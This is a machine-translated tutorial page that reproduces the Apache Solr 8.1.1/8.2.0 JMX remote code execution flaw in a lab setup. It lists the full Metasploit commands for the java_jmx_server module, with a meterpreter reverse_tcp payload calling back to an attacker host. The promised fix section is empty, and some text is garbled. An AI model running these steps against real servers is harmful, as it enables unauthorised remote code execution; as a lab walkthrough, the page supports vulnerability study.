Home >Operation and Maintenance >Safety >How to reproduce the RCE vulnerability in Apache Solr JMX service
Solr is an independent enterprise-level search application server that provides an API interface similar to Web-service. Users can submit XML files in a certain format to the search engine server through http requests to generate indexes; they can also make search requests through Http Get operations and get returned results in XML format.
This vulnerability stems from the security risk in the ENABLE_REMOTE_JMX_OPTS configuration option in the default configuration file solr.in.sh.
The ENABLE_REMOTE_JMX_OPTS="true" option exists in the built-in configuration file solr.in.sh of versions 8.1.1 and 8.2.0 of Apache Solr.
If you use the default solr.in.sh file from the affected version, then JMX monitoring will be enabled and exposed on RMI_PORT (default = 18983),
and no need to do anything Authentication. If this port is opened for inbound traffic in the firewall, anyone with network access to the Solr node will be able to access JMX and
can upload malicious code to be executed on the Solr server. This vulnerability does not affect users of Windows systems, but only affects users of some versions of Linux.
Apache Solr8.1.1 version online time: 2019-05-28
Apache Solr8.2.0 version online time: 2019- 07-25
If the victim uses this default configuration, the JMX service will be opened on the default port 18983, and authentication will not be enabled by default. Any attacker with access to this port could exploit this vulnerability to launch an attack on the affected service and execute arbitrary code.
Java environment and kali system, Solr 8.20
Solr 8.20 download address:
wget http:/ /archive.apache.org/dist/lucene/solr/8.2.0/solr-8.2.0.zip
##Use unzip solr-8.2.0.zip to decompress After decompression is completed, switch to the bin directory to start Solr./solr start -force Access after startup: http://192.168.10.176:8983/ ##0x04 vulnerability recurrenceVictim machine: docker IP in Ubuntu18.6: 192.168.10.184:8983
1. Use nmap to scan the port and find that port 18983 is open
2. Use exploit/multi/misc/java_jmx_server module in Metasploit to reproduce the vulnerability
Ø use exploit/multi/misc/java_jmx_server
Ø set RHOST 192.168.10.184
Ø set RPORT 18983
Set payload: java/meterpreter/reverse_tcp
Ø set payload java/meterpreter/ reverse_tcp
Ø set LHOST 192.168.10.147
Ø set LPORT 4444
##3. Use run to execute and you will see the successful establishment Connection
0x05 Fix suggestion
The above is the detailed content of How to reproduce the RCE vulnerability in Apache Solr JMX service. For more information, please follow other related articles on the PHP Chinese website!